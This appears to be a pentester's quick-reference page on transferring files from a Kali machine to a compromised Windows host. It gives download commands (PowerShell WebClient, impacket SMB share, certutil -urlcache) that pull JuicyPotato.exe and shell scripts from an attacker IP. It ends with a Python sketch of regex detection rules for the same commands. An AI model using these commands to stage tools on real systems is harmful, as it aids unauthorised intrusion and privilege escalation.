There are various ways to transfer files from your Kali machine to a Windows machine where you already have a shell. This is my quick reference for some of those methods.

PowerShell

If you have a PowerShell shell, you can use it to pull files from your Kali box, provided you have the simple HTTP server running:
(New-Object Net.WebClient).DownloadFile('http://10.10.14.7:5555/JuicyPotato.exe', 'C:\Users\kohsuke\Desktop\jp.exe')

Another way, from the Windows target: powershell "(New-Object System.Net.WebClient).DownloadFile('http://[your_ip]:[listening_port]/[shell_name.exe]', '[destination_path]')"

SMB Server

From your Kali machine: impacket-smbserver <share name> <share path>

Then, from your Windows machine (where you already have a shell), connect to the share: net use \\<Kali IP>\<share name>

From here, you should be able to just copy the files over: copy \\<Kali IP>\<share name>\<file name>

NOTE: There are times when SMB may crash on your Kali box, and when you re-run it you get the error: Address already in use. To fix this, run netstat -tlpen to verify that something is using port 445, then fuser -k 445/tcp to release the port, and start your SMB server back up.

CertUtil

If it is available on the Windows machine, CertUtil is a great way to transfer files. You'll need the file you want copied over sitting in the directory your Python SimpleHTTPServer is serving from:

certutil.exe -urlcache -split -f http://10.10.14.40/shell.bat shell.bat
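
For the blue-team side of the three methods above, here is a small detection sketch that flags them in process-creation command lines. It is an added example, not part of the original notes: the rule names, regex patterns, event layout and sample events are all constructed assumptions, not a vetted rule set.

```python
import re

# Illustrative patterns (assumptions), one per transfer method on this page.
RULES = {
    # certutil used as a downloader: -urlcache together with an HTTP(S) URL
    "certutil-urlcache": re.compile(
        r"\bcertutil(\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
    # PowerShell WebClient writing a remote file to disk
    "webclient-downloadfile": re.compile(
        r"\bnet\.webclient\b.*\.downloadfile\s*\(", re.I),
    # net use / copy against a share addressed by raw IPv4 instead of a hostname
    "smb-share-by-ip": re.compile(
        r"\b(net\s+use|copy)\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I),
}

def classify(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def scan(events):
    """Yield (host, rule, command_line) for each hit in process-creation events."""
    for event in events:
        for rule in classify(event["cmd"]):
            yield event["host"], rule, event["cmd"]

# Constructed sample events (documentation addresses, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01",
     "cmd": "certutil.exe -urlcache -split -f http://192.0.2.10/shell.bat shell.bat"},
    {"host": "WS01",
     "cmd": "powershell \"(New-Object System.Net.WebClient).DownloadFile("
            "'http://192.0.2.10:5555/a.exe', 'C:\\Temp\\a.exe')\""},
    {"host": "WS02", "cmd": "net use \\\\192.0.2.10\\share"},
    # Benign look-alikes that must not fire:
    {"host": "WS02", "cmd": "certutil.exe -hashfile C:\\Temp\\report.pdf SHA256"},
    {"host": "WS03", "cmd": "copy \\\\fileserver01\\public\\notes.txt ."},
]

if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{cmd}")
```

The last two sample events show why each rule keys on the combination (certutil plus -urlcache plus a URL, a share addressed by IP) rather than on the binary name alone.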
